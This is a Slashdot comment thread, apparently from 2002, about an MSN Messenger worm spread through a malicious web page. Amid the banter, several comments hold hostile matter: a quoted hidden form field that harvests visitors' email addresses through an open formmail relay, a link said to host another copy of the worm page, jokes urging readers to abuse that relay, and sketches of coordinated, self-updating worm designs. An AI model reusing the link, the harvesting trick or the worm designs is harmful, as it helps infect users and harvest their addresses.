    Actually if you read the EULA for windows nt it says that it's not to be used at hospitals in life-preserving machines, nuclear plants and such. Not only did God forbid Microsoft, they actually listened :D

  48. It could be worse... by Cowculator · · Score: 4, Funny

    "Go To http://www.goatse.cx NoW !!!"

    Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...

    1. Re:It could be worse... by Glorat · · Score: 2

      *Almost* tempted to Troll mod this one just for the sake of virgin newbies in Slashdot. But I'll let ya off just this once =P

    2. Re:It could be worse... by BlowCat · · Score: 2

      What are you talking about?
      goatse.cx is down since February 2 or so :-(
      Haven't you noticed?

    3. Re:It could be worse... by Anonymous Coward · · Score: 0

      Works for me!

      (Or is that my local cache?)

    4. Re:It could be worse... by shogun · · Score: 2

      Yeah I noticed, my squid acl rules that were blocking it were timing out in dns and making the proxy take ages to start. But never fear you can still get at goatse.cx with the Way Back Machine!

  49. So THAT's where the formmail.pl requests by SCHecklerX · · Score: 2
    are from!!!


    I know that formmail.pl has some vulnerabilities, and figured people were just probing me.


    This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with :(

  50. possibly try by Papst · · Score: 0

    whois masenko-media.net

  51. Warhol Virus by Metrollica · · Score: 1

    To me this sounds like Code Red, only speeded up so it could do a lot more scans in a much shorter period of time and infect many more computers. The author must be a bit more experienced than the author of Code Red because they have built in multithreading which wasn't in Code Red. This makes it possible to probe and attack multiple machines at once and even begins by attacking a list of 50,000 machines known to have good internet connections.

    --



    --Metrollica
  52. Re:Gee... by Cally · · Score: 4, Informative
    Well this is Waaaay off-topic... but WTF ;)

    Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.


    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
    --
    "None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
  53. Have any A/V Companies... by lblack · · Score: 3, Informative

    Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAfee.

    I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

    Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propagating, though, in that it requires the server-side in order to be malicious, or do anything at all.

    That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

    -l

    P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

    1. Re:Have any A/V Companies... by doorbot.com · · Score: 1

      Considering IM clients are very rarely work-related, I don't see why a company should need to protect against it. They should be limiting what crap you install on your workstation, with AIM/MSN messenger/Yahoo messenger/etc being one of them. Of course this would be covered under corporate policies, and should be enforced.

    2. Re:Have any A/V Companies... by AnotherBlackHat · · Score: 2

      I like the idea of third party protection for windows apps, but not for networking - I want protection for the file system. Imagine something like Zone alarm that pops up a dialog box asking if it's ok to let $app [read/write] files in $directory [never|once|today|always]?

      -- Our bits are better, they're gold plated.

    3. Re:Have any A/V Companies... by lblack · · Score: 2

      Yes, but IM software is very common on home machines, and home machines with big fat 24/7 DSL/Cable can be used in DDOS against corporate networks.

      So, you see, the issue isn't a corporate security package -- as you mention, the need for this is obviated by corporate policies. It's the need to have an easy-to-use method of protecting home users, so they aren't co-opted into doing nasty things to my webserver. ;)

      -l

  54. Re:Well, that's one less effectual site for vector by Anonymous Coward · · Score: 0

    So, because the site was posted on /. it went down. And therefore the virus can't spread. I do believe this is the first *POSITIVE* application of a /.ing ever.

  55. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 0

    Amazingly, the address looks like it is legit.

  56. Re:No DNS Record? (Geeky Observations) by dpu · · Score: 1

    i hope you don't talk that way to your (unfortunate) kids when they make a mistake.

    --
    Dammit, I meant to post that anonymously!
  57. go to the web site i dare you :) by Anonymous Coward · · Score: 0

    how many linux users have actually gone to the web site just for fun????

  58. Sends mail too .. email address harvesting? by Wizard+of+OS · · Score: 5, Informative

    Look closely:

    <input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

    I think somebody forgot that HTML source can be viewed ...

    The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.

    --

    --
    If code was hard to write, it should be hard to read
    1. Re:Sends mail too .. email address harvesting? by m0sh3 · · Score: 1

      Well, maybe it's for mailbombing purposes..

    2. Re:Sends mail too .. email address harvesting? by Quizme2000 · · Score: 2

      I was wondering why that domain name was port scanning my servers.

      --
      "Get them before they get....
    3. Re:Sends mail too .. email address harvesting? by ethereal · · Score: 1

      I've been seeing scans from wanadoo.fr for weeks, wonder if it's the same outfit?

      --

      Your right to not believe: Americans United for Separation of Church and

    4. Re:Sends mail too .. email address harvesting? by Tha_Zanthrax · · Score: 1

      Probably a scriptkiddie, look at http://www.wanadoo.nl/.
      It's nothing special, they provide free internet-access in Holland

    5. Re:Sends mail too .. email address harvesting? by pyz · · Score: 1

      If mmargae@wanadoo.nl is this user's email address, then
      home.wanadoo.nl/mmargae/
      is the user's homepage. It's broken, though.

      cheers

      pyz

    6. Re:Sends mail too .. email address harvesting? by ConsumedByTV · · Score: 2

      I Get that all the time as well, mostly anonymous connections to my ftp server or to my webserver. What services of interest are you running in contrast with my ftp and web?

      --


      "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
    7. Re:Sends mail too .. email address harvesting? by ethereal · · Score: 1

      I'm running the same services. I believe wanadoo is one of the most frequent scanners listed on dshield.org, or at least they were a month or two ago.

      --

      Your right to not believe: Americans United for Separation of Church and

    8. Re:Sends mail too .. email address harvesting? by Anonymous Coward · · Score: 0

      I live in Holland, wanadoo is a big company. Apart from free access there is also Euronet and cable (NOT FREE). This person has an email address @ casema.net (this is the cable company, hence
      no free access). Probably he did something to piss the maker of this thingie off.

    9. Re:Sends mail too .. email address harvesting? by ConsumedByTV · · Score: 1

      Wonderful, I wonder which corp that is?

      Anyway, in reference to your sig, the second time I read that article it was to a group of about a hundred people. Talk about horrid truth.

      --


      "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
  59. Oops by Eric+Damron · · Score: 3, Funny

    I just copied and pasted part of this story into an outlook email and sent it to our staff warning them of the problem. The address to the masenko-media site came out as a URL. I wonder how many users will click it?

    --
    The race isn't always to the swift... but that's the way to bet!
  60. Why this is news by jeff13 · · Score: 3, Informative

    People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?

    Just because it's the latest #@#k up from Microsoft doesn't diminish its importance as news.

    How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder silliness and effectively cracking the luser's OS? They were none too pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...

    And it's better to find out about these things in the news, not the hard way!

  61. Erlang Virus Propagation System by Anonymous Coward · · Score: 5, Interesting

    "A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."

    Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.

    An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.

    As I recall, there was a story on /. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.

    Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!

    1. Re:Erlang Virus Propagation System by _Knots · · Score: 1

      What about self-updating viruses? Take Code-Red, add already-infected detection so Target knows when Infector is scanning it, then Infector checks its local database of attacks and asks Target if it 1) has additional, 2) would like one of the ones it doesn't have that Infector does and 3) for success-statistics on every known method (just two counters, success / total attempts). If the success / total ratio goes too low, the virus could shed that attack, assuming that it has become patched everywhere. Shedding might be done in a non-probabilistic manner so that not all the viruses shed an attack (there will be *somebody*).

      Additionally, using non-random address generators could help (OH, look, I'm on 192.168.0.10/24... let's attack all the 192.168.0.* hosts first) and get some interesting virus (beowulf? Sorry...) clusters up.

      Comments?

      --Knots

      --
      Anarchy$ dd if=/dev/random of=~/.signature bs=120 count=1
  62. Microsoft and Viruses by wazootyman · · Score: 0, Flamebait

    I don't know what's worse. The fact that you guys can nitpick so much, or the fact that I take the time to read it. You do realize that if linux apps were as mainstream and easy to use as Microsoft products, they'd be exploited just as much, right? Oh wait, I forgot. Those programmers who make 6 figures at Microsoft are just script kiddies who can't code. I'm sure the typical open source programmer could blow any of them away. I'm sure...

  63. Month half over by 3ryon · · Score: 4, Funny

    I guess they will need the whole month to 'focus on security'. Good thing they budgeted so much time.

  64. For all you Primus fans by scorcherer · · Score: 2
    "It's alright to fear the worm."

    (Prof. Nutbutter / Tales from the Punchbowl)

    --

    --
    The Cap is nigh. Time to get a fresh new account.

  65. Re:Well, that's one less effectual site for vector by xintegerx · · Score: 2, Insightful

    Isn't it possible that the virus itself flooded the website with many hits to it coming from just instant messenger? :)

    Plus, since the topic author knew the exact URL from somewhere, it must have already been fairly widespread before it got here :)

  66. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 0

    I just punch mine in the face

  67. What is .NET? by bahwi · · Score: 1, Offtopic

    What is .NET?

    Well, here's the answer. =)

  68. That site is so... by switcha · · Score: 1

    Dude, that site is soooo Slashdotted.

    --
    You know what? ... A little club soda *did* get that out!
    1. Re:That site is so... by thilmony · · Score: 1

      google cache "works"

      --
      YES, there is a McDonald's in Hanoi Square.
  69. question by samabdulla · · Score: 1

    i copied this script and put it up on my website www.samisgod.com/cool.html but it's not working...is it a server side script?

  70. NOT a "Warhol Worm", just topologically aware by nweaver · · Score: 5, Informative

    Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

    It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

    For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.

    --
    Test your net with Netalyzr
    1. Re:NOT a "Warhol Worm", just topologically aware by Shiny+Metal+S. · · Score: 2
      > It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.
      What if that Javascript code was sent in HTML email? Would it be run as well? Outlook uses IE to render HTML, right?

      I can't check it by myself (I don't use Microsoft software), but I'm curious.

      --

      ~shiny
      WILL HACK FOR $$$

  71. I hope that the virus writers... by Rune69 · · Score: 2, Funny

    ...are aware of the seriousness of their acts.
    Don't they know that virus making will soon be considered a hate crime?

    On another note, I wonder how many victims of the Warhol virus also caught this recent virus.

    --

    When faced with a problem, many web developers say "I know, I'll use JavaScript!".
    Now they have two problems.
  72. In related news by Metrollica · · Score: 4, Funny

    The "Don't Fucking Open Me!" virus is still spreading havoc.

    E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.

    Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".

    "This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.

    Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.

    Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"

    Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."

    Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".

    --



    --Metrollica
  73. A bunch of "old" features. by Bender+Unit+22 · · Score: 2

    Well, there have been a couple of well-known "features" for some time. All you needed was to insert some code on your site and you could see who visited you on the site and who their "Friends" were. On all sites this was only their Messenger name, including the ones on your contact list.

    Then there are some URLs hardcoded into Messenger that allow certain sites to obtain your email address and the email addresses of the people in your contact list. These sites include microsoft.com, hotmail.com.

    Hmm thinking about whipping up an example on my website, heh could be fun.

  74. So many holes, so little time by poemofatic · · Score: 1, Troll



    MS wrote IE.

    MS wrote Messenger.

    MS wants to bundle the two together into their OS.

    A browser is not a server.

    Linux is a kernel, not a distro.


    Your comment has too few characters per line (currently 9.1).

    --

    When in doubt, have a man come through a door with a gun in his hand.

  75. This got me thinking by t_allardyce · · Score: 2

    Before, i was convinced that Microsoft's obsession with closed source was an evil plan to allow them to hide malicious code in Windows so they could take over computers/internet/world. Now i have come to realise, that the real reason is because they are so incompetent that they don't want anyone to see the crap, uncommented, un-nested, spaghetti code that they call software, for risk of other corporations laughing at them, like a lecturer laughs at the bottom-of-the-class student who submits their half-assed assignment code that looks like a 3-year old wrote it (i'm sure many 3 year olds could actually write decent code :) If anyone witnessed what was really in the operating system their business was relying on, they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)

    Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.

    --
    This comment does not represent the views or opinions of the user.
  76. who would click on it? by FCAdcock · · Score: 0

    Now who in the heck follows links from random people that they don't know off of the internet? If you ask me, these are getting what their un-intelligence deserves.

    --
    --Forest C. Adcock--
    1. Re:who would click on it? by Anonymous Coward · · Score: 0

      wow some ppl really can't be arsed to read more than the headline can they?

  77. People clicking on links... by Macrobat · · Score: 5, Funny
    True story:

    I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."

    When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

    Didn't know what to say to that.

    --
    "Hardly used" will not fetch you a better price for your brain.
    1. Re:People clicking on links... by Anonymous Coward · · Score: 0

      I'd wash that telescope before I put my eye to it. I get the feeling your friend's brother might be using it for something besides stargazing...

    2. Re:People clicking on links... by Radical+Rad · · Score: 2
      > When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

      The naked girl pictures are probably from a 46 year old fat, balding, gay man who is just trying to get your friend's brother to send back pictures of himself!

    3. Re:People clicking on links... by shaunak · · Score: 1

      "When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!""

      It's a good thing you didn't reveal her email address.
      Aside from privacy issues, I'm sure the poor lass would stop using her computer if she received an email from each and every /.er requesting her naked pics - would that be the first /. effect for email addresses?
      (Psst - you could send her email addy just to me, you know - I'll keep it a secret - I swear - on my honor ;)) Just kidding - Mod me down, Scotty.

      --
      -Shaunak.
    4. Re:People clicking on links... by roystgnr · · Score: 5, Funny

      > Didn't know what to say to that.

      Well, duh. Two words:

      "Prove it!"

    5. Re:People clicking on links... by Anonymous Coward · · Score: 0

      > > Didn't know what to say to that.
      > Well, duh. Two words:
      > "Prove it!"

      You forgot to continue it with:

      "on www.flashyourrack.com"

      We now return you to your scheduled MS flamefests.

  78. Where is Windows Update? by weave · · Score: 3, Insightful
    I went to Windows Update this morning looking to update my IE using that uber patch. Said no critical updates. I had to go to technet and download the patch from there.

    Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?

    Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes I administer at work, scheduled them to be updated, done. I go look for an SNMP update for my Windows servers, none found.

    It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...

    1. Re:Where is Windows Update? by torklugnutz · · Score: 1

      I can't even get onto WindowsUpdate with my win2k or winxp machines. I tried off and on for most of saturday and eventually it worked. Now, I try again, and I'm getting the same old Can't Find Server message. Anyone else having problems with the site, or is it just me?

      --
      Often in Error, Never in Doubt.
    2. Re:Where is Windows Update? by citking · · Score: 1
      Even better yet, since MS has decided to put off new work until it can fix their buggy, already-released programs, you'd think this would get some sort of priority.

      Personally, I think I'll stick with Trillian. It's so much easier.

      --
      "This food is problematic."
    3. Re:Where is Windows Update? by steve_l · · Score: 1

      me too. Been probing to see what the lag is between a major bug report and XP update having it. Last time it was 48 hours, this time the site's DNS record is missing.

      maybe it's down in this four week rush to get security right in windows.

    4. Re:Where is Windows Update? by WhiteKnight07 · · Score: 2, Informative

      The "Uber Patch" is available for download here.

      --


      We're going to make information free Mr. Anderson, whether you like it, or not.
    5. Re:Where is Windows Update? by aunitt · · Score: 1

      It's even worse than that. I've gone to the bother of downloading the patch for IE6 from Technet (quite a lot of bother as it's 2Mb+ and I've only got a slow connection), and I've tried to install it and it tells me "Sorry this patch if for IE6" - I do have IE6 installed.

      Oh well buggered by Bill again. :-(

  79. The joys of irony... by wrinkledshirt · · Score: 2, Funny

    I hate Microsoft, but my favourite part isn't this story. My favourite part is the link directly under it.

    < What is .NET? | Linus Merges ALSA Into 2.5.4 >

    You gotcher answer, folks.

    --

    --------
    Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...

  80. Re:CAPITALS ARE GOOD by Anonymous Coward · · Score: 0


    DR MDRTR PRSNS T S JST M
    JNS. D NT KNW WHY Y R
    CLLNG M FFTPC BCS S
    THNK TH TPC S MCRSFT
    NSTNT MSSNGR ND M WRTNG
    T TLL LL F SLSHDT THT W F
    FGHNSTN PPL RGRT THS
    TRRBL TTCK GNST TH MRCN
    PPL ND THR MSSNGNG SYSTM.
    THT S TH TPC ND THT S LL
    WSHD T SY.

    YR FRND,
    -JNS.

  81. Re:Gee... by Frater+219 · · Score: 5, Informative
    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

    A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

  82. Use Trillian by GooseKirk · · Score: 1

    YES! That's excellent advice. I removed MS Messenger and installed Trillian, and I can't remember the last time I was so completely thrilled with a piece of software. Use Trillian. It does AIM, ICQ, MSN, Yahoo, and IRC, it's free, it looks awesome, it's updated often, it's easy to use, it works well, and did I mention it looks awesome? If there's any reason to use any other IM client, I don't know what it is...

    1. Re:Use Trillian by Yottabyte84 · · Score: 2
      If there's any reason to use any other IM client, I don't know what it is...


      Here are 2.


      1.) If you don't use Windows

      2.) You use some of the special features that the official client has but trillian does not.

  83. Yahoo too possibly by ZaneMcAuley · · Score: 1

    I already renamed my HTML tags that I think are dangerous to and currently used by booters to cause an AV on ypager.exe with a hex editor.

    I might do the same with MSN now.

    I was told there is a Yahoo messenger virus doin the rounds too, but I haven't seen it (yet).

    --
    ----- Whats wrong with this picture? http://www.revoh.org:1234/whatswrong
  84. Re:Well, that's one less effectual site for vector by silicon_synapse · · Score: 2, Informative

    Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.

  85. Don't click on links in article description! by ahde · · Score: 2, Informative

    they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE

  86. this is nothing new by Anonymous Coward · · Score: 0

    MSN Messenger viruses have been around for a while. A friend of mine got infected and it kept trying to make it look like she was trying to send me her new photos (which were in fact the virus's .exe).
    MS didn't design MSN Messenger with much thought to viruses. No kudos going their way over that..

  87. Re:Well, that's one less effectual site for vector by Anonymous Coward · · Score: 1, Funny

    Woo.. You used organized, and OSDN in the same sentence! That's pretty funny stuff!

  88. angelfire's response to the /. effect by erobertstad · · Score: 1

    [angelfire]

    Temporarily Unavailable

    The Angelfire site you are trying to reach has been temporarily suspended due to excessive bandwidth consumption.

    The site will be available again in approximately 2 hours!

    Are you the owner of this site?

    To check your daily bandwidth usage, click here.

    To obtain a higher bandwidth limit, click here.

  89. Careful with your statistics by Random+Bystander · · Score: 2, Interesting

    Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

    Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)

    Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.

  90. Know how to stop IE from launching MSN Msgr? by HuvahCraftah · · Score: 1

    It really annoys me, I log into hotmail to check my mail and it launches MSN! I only keep it around in case Trillian decides to crap out on me.

    Is there a way to keep IE from launching it without totally breaking MSN Messenger?

    1. Re:Know how to stop IE from launching MSN Msgr? by mech9t8 · · Score: 5, Informative

      You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

      Remove the following registry keys:

      HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441-00C04F795683}
      HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-0000F875C541}
      HKEY_CLASSES_ROOT\Messenger.MsgrObject

      and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

      You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

      You'll need to remove them again if you upgrade or reinstall - it'll put the references back.

      --
      Convictions are more dangerous enemies of truth than lies.
      - Nietzsche
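
The rename-instead-of-delete approach from the comment above, as an added PowerShell example (not code from the thread or from Microsoft). The three key paths are the ones quoted in the comment, with the spaces introduced by line-wrapping removed, and the `backup_` prefix follows the comment's suggestion; the script parameters and the export directory are assumptions.

```powershell
#Requires -RunAsAdministrator
# Park (or restore) the Messenger web-object registrations named in the comment.
# Renaming keeps the data, so -Restore puts everything back. Try -WhatIf first.
[CmdletBinding(SupportsShouldProcess)]
param(
    # Assumed location for the .reg exports taken before each rename.
    [string]$BackupDir = (Join-Path $env:USERPROFILE 'messenger-key-backup'),
    [switch]$Restore
)

# Key paths as given in the comment.
$keys = @(
    'HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441-00C04F795683}',
    'HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-0000F875C541}',
    'HKEY_CLASSES_ROOT\Messenger.MsgrObject'
)
$prefix = 'backup_'

if (-not $Restore) {
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
}

foreach ($key in $keys) {
    $cut    = $key.LastIndexOf('\')
    $parent = $key.Substring(0, $cut)
    $leaf   = $key.Substring($cut + 1)

    if ($Restore) {
        $from    = "Registry::$parent\$prefix$leaf"
        $newName = $leaf
    } else {
        $from    = "Registry::$parent\$leaf"
        $newName = "$prefix$leaf"
    }
    $to = "Registry::$parent\$newName"

    if (-not (Test-Path -LiteralPath $from)) {
        Write-Warning "Not present, skipping: $from"
        continue
    }
    if (Test-Path -LiteralPath $to) {
        # Happens when a reinstall re-registered the key after an earlier run.
        Write-Warning "Target already exists, resolve by hand: $to"
        continue
    }

    # Keep a .reg export as a second way back before touching the live key.
    if (-not $Restore -and $PSCmdlet.ShouldProcess($key, 'Export to .reg file')) {
        $file   = Join-Path $BackupDir (($leaf -replace '[{}]', '') + '.reg')
        $regKey = $key -replace '^HKEY_CLASSES_ROOT', 'HKCR'
        & reg.exe export $regKey $file /y | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "reg export failed for $key" }
    }

    Rename-Item -LiteralPath $from -NewName $newName
}

# Report the current state; a reinstall or upgrade brings LIVE entries back.
foreach ($key in $keys) {
    $state = if (Test-Path -LiteralPath "Registry::$key") { 'LIVE' } else { 'not registered' }
    Write-Output ("{0,-16} {1}" -f $state, $key)
}
```

Running it again after an upgrade or reinstall shows whether the registrations have returned, which is the situation the comment warns about.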
  91. Re:CAPITALS ARE GOOD by Delusionner · · Score: 1

    I have enough of capitals. they seem like you're screaming everything. Plus, I hate my COBOL! course. This language is so old it looks like it's been designed to make grandma's weaver work. Anyways. About that "virus" I hope it doesn't do anything more than messaging people. t'would suck to install once more that (X)tra (P)epperoni. I think I wouldn't re-install it. If it's f@ked up because of some lame microsoft security bug well it'll go down and crash good time HAHAHAHAHAHAHA! (oops caps again).

  92. Most of Matt Wright's scripts are unsafe by Anonymous Coward · · Score: 0

    They are easy to install and convenient. Therefore people think they are good. But they are not, they are badly written.

    For details you can ask for details on PerlMonks.

  93. Re:Gee... by generic-man · · Score: 2, Insightful

    So according to the issue of RISKS Digest, this third-party program called "Ladarvision" kept on throwing very odd error messages internal to the program, and the tech was trained to hit RETURN. How is this Microsoft's fault?

    Windows 95 is pretty stable if you use it as a single-tasking OS. I mean, there are still point-of-sale systems running DOS, and that provides just slightly less memory protection than Windows 95 does. Just don't blame the OS vendor for a shoddily-written third-party program.

    --
    For more information, click here.
  94. Where does that implant go????? by bubbha · · Score: 1

    ....your forehead or your foreskin.....

    --
    I want to be alone with the sandwich
  95. masenko-media.net by Anonymous Coward · · Score: 1, Informative

    WHOIS information for masenko-media.net:

    The Data in Network Solutions' WHOIS database is provided by Network
    Solutions for information purposes, and to assist persons in obtaining
    information about or related to a domain name registration record.
    Network Solutions does not guarantee its accuracy. By submitting a
    WHOIS query, you agree that you will use this Data only for lawful
    purposes and that, under no circumstances will you use this Data to:
    (1) allow, enable, or otherwise support the transmission of mass
    unsolicited, commercial advertising or solicitations via e-mail
    (spam); or (2) enable high volume, automated, electronic processes
    that apply to Network Solutions (or its systems). Network Solutions
    reserves the right to modify these terms at any time. By submitting
    this query, you agree to abide by this policy.

    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM
    The previous information has been obtained either directly from the
    registrant or a registrar of the domain name other than Network Solutions.
    Network Solutions, therefore, does not guarantee its accuracy or
    completeness.

  96. source code by daverr · · Score: 0, Offtopic

    where can I get the source code? I love learning about how viruses work and how they control apps remotely

    1. Re:source code by Anonymous Coward · · Score: 0

      here is another page with what seems to be a different version of the code. please don't click the link. i did and now i am infected and don't know how to get rid of it. this sucks!

      http://users.skynet.be/dark.angel/cool.htm
      pleas

  97. Re:COBOL by Anonymous Coward · · Score: 0

    Why is it being old make it bad?

    -AC

  98. Just click this link to send them mail :) by sh0rtie · · Score: 1

    Unhappy? thanks to the beauty of Matt's formmail you can mail them by simply clicking this link :)

    Click here to mail them :)

    1. Re:Just click this link to send them mail :) by Noodleroni · · Score: 1

      Just click the link, a page pops up that says slashdot.org isn't an allowed referrer. So, just click in the location bar and press enter. They get a stupidly beautiful message :-P

      --
      Esse quam vederi.
  99. Ok, now what? by Anonymous Coward · · Score: 0

    So, I clicked a link before reading /. (what was I thinking??), and I am guessing I now have the 'virus'. Downloading the update for Ie will fix this? Or do I have to manually go in and clean files? Thanks for any help.

  100. Oops shame the referrer check is on but. . . . . by Anonymous Coward · · Score: 0



    Copy and paste works just fine ;)

  101. When it rains, it pours? by Keith+Russell · · Score: 2

    It's 9:35 pm EST, and Windows Update seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?

    Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.

    --
    This sig intentionally left blank.
    1. Re:When it rains, it pours? by quan74 · · Score: 0

      No, it's not just you, been trying to patch a system at work for a while. If you're looking for the IE 5.x-6 cumulative patches released yesterday try here:

      http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp

      As of 10:30 PM EST it was accessible.

      Q

  102. Duhhhh... Why not... by Shuh · · Score: 5, Funny

    Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

  103. cheap shot by MaxwellsSilverHammer · · Score: 2, Funny

    Was this before or after they investigated the code for security problems per the new order?

